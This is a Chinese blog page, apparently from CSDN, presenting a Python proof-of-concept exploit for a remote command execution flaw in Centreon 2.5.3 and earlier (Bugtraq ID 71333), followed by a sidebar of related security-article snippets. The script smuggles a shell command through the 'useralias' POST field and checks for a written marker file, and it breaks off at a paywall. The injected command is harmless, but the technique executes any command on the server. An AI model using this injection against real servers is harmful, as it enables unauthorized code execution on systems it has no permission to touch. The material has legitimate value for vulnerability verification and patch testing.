Bugtraq ID:71333 PoC

最新推荐文章于 2024-07-08 21:50:19 发布
原创 最新推荐文章于 2024-07-08 21:50:19 发布 · 1.6k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#Centreon #漏洞

这是一个关于Centreon 'exec()'函数远程命令执行漏洞的Python poc。漏洞影响Centreon <= 2.5.3版本,触发条件是开启调试权限。 poc通过构造特定的POST数据,尝试利用漏洞写入文件验证漏洞存在。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

#!/usr/bin/python
#coding: gb2312

# 文件名称:centreon_exec_rce_poc.py
# 编写时间:2014-12-09
# 更新时间:2015-07-17

# 漏洞说明:Centreon 'exec()' 函数远程命令执行漏洞
# 影响版本:Centreon <= 2.5.3
# 特别说明:该漏洞的触发条件是开启了调试权限。具体配置参考:系统管理 -> 参数 -> 调试 -> 认证debug -> Yes

# 漏洞参考:
# Bugtraq ID:71333
# http://www.securityfocus.com/bid/71333/

import sys
import urllib

flag = "leng_que"

# 备注:Centreon内部会把`号过滤掉,同时会把*号转换为\*
shell_cmd = "echo -n '"+flag+"' > leng_que.txt;"

def main(centreon_server_url):
    post_data = urllib.urlencode({"useralias": "\";"+shell_cmd+"\"", "password": "leng_que", "submit": "leng_que"})
    r = urllib.urlopen(centreon_server_url, post_data)
    if ( 200 == r.getcode() ):
        test_file_url = centreon_server_url+"/leng_que.txt"
        r = urllib.urlopen(test_file_url)
        if ( 200 == r.getcode() and flag == r.read() ):
            print "漏洞肯定存在"
        else:
            print "漏洞或许不存在"
    else:
        print "无法判断漏洞是否存在"

if __name__ == '_
最低0.47元/天 解锁文章

200万优质内容无限畅学
Poc/Exp漏洞验证利用脚本编写
悦分享
07-07 6252
一、安全名词1. POCPOC,Proof ofConcept,中⽂意思是“观点证明”。这个短语会在漏洞报告中使⽤,漏洞报告中的POC则是⼀段说明或者⼀个攻击的样例,使得读者能够确认这个漏洞是真实存在的。2. EXPEXP,Exploit,中文叫漏洞利用程序。意思就是该漏洞存在公开的利用方式(比如一个脚本),就是一段可以发挥漏洞价值的程序,对漏洞如何利⽤的详细说明或者⼀个演⽰的漏洞攻击代码,可以使得读者完全了解漏洞的机理以及利⽤的⽅法。想象一下这样的场景,目标存在一个 SQL 注入漏洞,然后被你知道了,然后
【vulnhub】【DC系列】DC6 - WordPress Active monitor靶机
Nicky_Zheng的博客
01-26 783
作者提示爆破的用户名需要通过筛选rockyou中含有k01的内容作为字典 1、信息收集 通过端口扫描及目录扫描,确认为 WordPress,靶机ip为:192.168.57.152 1.1、应用扫描 wpscan --url http://wordy -e u,vp,vt --plugins-detection=aggressive _______________________________________________________________ __ .
BugTraq是什么?
冷却
09-22 4409
BugTraq是什么? BugTraq是一个完整的对计算机安全漏洞(它们是什么,如何利用它们,以及如何修补它们)的公告及详细论述进行适度披露的邮件列表。  ---------------------------------------------------以下是原文---------------------------------------------------  Wha
bugtraq linux 登陆_10款黑/客专用的Linux操作系统发行版
weixin_39969881的博客
12-22 340
1. Kali LinuxKali应该是最著名的用于***测试的Linux发行版,用于白帽***和***测试。Kali由OffensiveSecurity开发,最初由BackTrack开发。Kali是基于Debian的发行版。它自带有来自安全和取证各个领域的大量***测试工具。现在,它遵循滚动发布模型,可以使您集合中的每个工具将始终保持最新状态。它是目前最先进的***测试平台,可支持各种设备和硬件...
***测试、电子取证系统 – Bugtraq-I
weixin_33868027的博客
07-31 246
到这你可能发现没有什么特别的,但是在看过它的工具列表以后我发现这是一个有自己特色的系统。 首先是对无线和蓝牙有特别的支持:有着打了补丁的2.6.38内核和一大串的支持列表以及丰富的软件: Wireless adm8211 ath5k ath9h ar9170 b43 b43legacy iwl3945 iwlagn ipw2100 ipw2200 ...
bugtraq mysql_MySQL sql_parse.cc远程格式串漏洞
weixin_34773479的博客
01-26 269
BUGTRAQ ID: 35609MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。MySQL的sql_parse.cc文件中的dispatch_command()函数存在格式串错误:2084行:case COM_CREATE_DB: // QQ: To be removed{char *db=thd->strdup(packet...
Svn与Bug系统集成:Bugtraq属性
lovec的专栏
04-02 640
       以下一些属性在 Subclipse 和 TortoiseSVN 设置成功  bugtraq:url ,指向Bug系统的URL,此URL中应该包含"%BUGID%",这样svn就会在提交的时候自动将那个字符串替换成相应的数字 bugtraq:warnifnoissue,"true/false",设置为true,那么在提交的时候,没有填问题(issue)输入框,系统...
CVE-2006-3747:有关我在CVE-2006-3747上的咨询的信息(Apache mod_rewrite LDAP一次性缓存溢出)。当时,这是第一个公开工作的漏洞利用
05-05
Bugtraq ID:19204 CERT咨询:VU#395412 严重程度:高 CVSS v2基本得分:7.6高(AV:N / AC:H / Au:N / C:C / I:C / A:C) 介绍 2006年7月28日,Mark Dowd(McAfee Avert Labs)向bugtraq邮件列表报告了在...
Vulnhub靶场DC-6练习
最新发布
Reset
07-08 1102
netdiscover探测目标主机ip。nmap探测开放端口和服务。dirsearch查看网站目录结构。wpscan扫描wordpress的用户。wpscan利用wordlists字典爆破密码。Activity monitor插件的漏洞:CVE-2018-15877反弹shell。nmap提权。
漏洞都是怎么编号的CVE/CAN/BUGTRAQ/CNCVE/CNVD/CNNVD
热门推荐
aletero的专栏
05-08 1万+
在一些文章和报道中经常提到安全漏洞CVE-1999-1046这种CVE开头的漏洞编号,这篇文章将常见的漏洞ID的表示方法做下介绍:   1、以CVE开头,如CVE-1999-1046这种      CVE 的英文全称是“Common Vulnerabilities & Exposures”公共漏洞和暴露。CVE就好像是一个字典表,为广泛认同的信息安全漏洞或者已经暴露出来的弱点给出一个公共的名
常用的渗透测试系统及下载地址
12-10
主要是跟渗透测试方面有关的,常用的渗透测试系统及下载地址
POC and frame_num 详细解析,清晰易懂
11-15
POC and frame_num 详细解析,清晰易懂注意,H264码流的输出顺序是编码顺序,所以在编码B帧的时候,由于B是双向预测,需要先编码后面编码帧P/I,这时候先输出I/P,后面才有B帧,我们在解码段拿到相应的I/P帧后,不能马上丢到buffer list里面,还需要等待后面的B帧,解码B帧后再reorder.所以相应产生了两个参数。poc, frame_num,这两个元素在slice级输出
bugtraq linux 登陆_|Linux Kernel多个安全漏洞 - 信息安全漏洞门户 VULHUB
weixin_35645077的博客
01-16 1728
BUGTRAQ ID: 15049 CVE(CAN) ID: CVE-2005-3053,CVE-2005-3106,CVE-2005-3107,CVE-2005-3108,CVE-2005-3109,CVE-2005-3110 Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel中存在多个漏洞,具体如下: sys_set_mempolicy()函数中存在拒...
漏洞扫描(漏洞库&漏洞扫描器)
weixin_63082823的博客
09-21 1731
是一个自动化的Web应用程序安全测试工具,它可以扫描任何可通过Web浏览器访问的和遵循HTTP/HTTPS规则的Web站点和Web应用程序。— 其运作效能能随着系统的资源而自行调整。BugTraq漏洞库(http://www.securityfocus.com/bid)中国计算机网络应急处理协调中心 (http://www.cert.org.cn)ICAT漏洞库(http://icat.nist.gov/icat.cfm)CERT/CC漏洞信息数据库 ( http://www.cert.org )
小白学安全-漏洞编号的理解 CVE/CAN/BUGTRAQ/CNCVE/CNVD/CNNVD
xqdd的专栏
11-09 3407
CVE就好像是一个字典表,为广泛认同的信息安全漏洞或者已经暴露出来的弱点给出一个公共的名称。假设在一个漏洞报告中指明的一个漏洞,假设有CVE名称,你就能够高速地在不论什么其他CVE兼容的数据库中找到对应修补的信息,解决安全问题。是中国信息安全测评中心为切实履行漏洞分析和风险评估的职能,负责建设运维的国家信息安全漏洞库,为我国信息安全保障提供基础服务。CNCVE就是中国(CN)的CVE,是CNCERT/CC(国家计算机网络应急处理协调中心)为漏洞进行编号的一个自己的标准,即国家计算机网络应急处理协调中心。
一些工具下载地址
Askeyes的专栏
11-01 1069
<br />arm-none-linux-gcc:<br />http://www.codesourcery.com/downloads/public/gnu_toolchain/arm-none-linux-gnueabi<br /><br /><br />mingw:<br />http://sourceforge.net/projects/mingw/ ,下载后网络安装<br /><br /><br />adb: <br />http://nchc.dl.sourceforge.net/project
10大黑客专用的 Linux 操作系统,每个都很酷
weixin_45311714的博客
09-06 5489
10大黑客专用的 Linux 操作系统,每个都很酷。
史上最全网络安全站点集合
2301_80115097的博客
10-18 2939
https://github.com/secretsquirrel/the-backdoor-factory/(the-backdoor-factory项目)whois,whois查询,whois信息查询,whois查询工具,whois实时查询,域名查询工具,域名注册信息查询 - T00ls(t00ls工具)Focus on network security!https://github.com/HarmJ0y/Malleable-C2-Profiles(Malleable-C2-Profiles项目)
10大黑客专用的 Linux 操作系统,每个都很酷!
yy1715713348的博客
04-08 1484
为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以# 学习资料分享当然,只给予计划不给予学习资料的行为无异于耍流氓,### 如果你对网络安全入门感兴趣,那么你点击这里👉优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享如果你对网络安全感兴趣,学习资源免费分享,保证100%免费!!!
Mantis与SVN整合:源码管理与缺陷跟踪教程
- `bugtraq:message`:包含bug ID的提交消息模板,如`issue%BUGID%` - `bugtraq:warnifnoissue`:如果未关联bug ID,提示用户。 3. **创建post-commit钩子**: 在SVN版本库的hooks目录下,创建一个名为`post-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值